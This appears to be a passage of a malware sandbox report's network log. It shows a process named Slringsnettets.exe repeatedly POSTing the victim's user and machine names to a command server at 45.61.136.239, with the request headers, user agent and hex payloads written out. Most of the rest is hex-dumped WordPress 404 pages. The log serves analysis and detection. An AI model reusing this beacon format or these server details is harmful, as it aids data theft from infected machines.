Jul 4, 2024 08:23:26.554702997 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:23 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:26.554764986 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:26.554775953 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:26.554944992 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:23:26.554956913 CEST	896	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:23:26.555058956 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:26.555069923 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:23:26.555083990 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:23:26.555104971 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:23:26.555119038 CEST	1236	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49752	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:26.698637962 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:26.703630924 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:29.474637032 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:27 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:29.474664927 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:29.474684954 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:29.474805117 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:23:29.474973917 CEST	1236	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:23:29.475001097 CEST	1236	IN	Data Raw: 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c Data Ascii: wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-sep
Jul 4, 2024 08:23:29.475013971 CEST	1236	IN	Data Raw: 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 Data Ascii: */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text
Jul 4, 2024 08:23:29.475481987 CEST	1236	IN	Data Raw: 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 Data Ascii: 0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb
Jul 4, 2024 08:23:29.475493908 CEST	1236	IN	Data Raw: 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d Data Ascii: ge: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--7
Jul 4, 2024 08:23:29.475508928 CEST	556	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d Data Ascii: p--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49753	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:29.621057987 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:29.631213903 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:32.957206011 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:30 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:32.957237959 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:32.957252026 CEST	448	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:32.957355976 CEST	1236	IN	Data Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
Jul 4, 2024 08:23:32.957367897 CEST	1236	IN	Data Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
Jul 4, 2024 08:23:32.957385063 CEST	448	IN	Data Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61 Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
Jul 4, 2024 08:23:32.957478046 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:32.957551956 CEST	224	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1
Jul 4, 2024 08:23:32.957561016 CEST	1236	IN	Data Raw: 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 Data Ascii: .25em 2.375em}</style><style id='classic-theme-styles-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;paddin
Jul 4, 2024 08:23:32.957637072 CEST	224	IN	Data Raw: 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c Data Ascii: --gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0

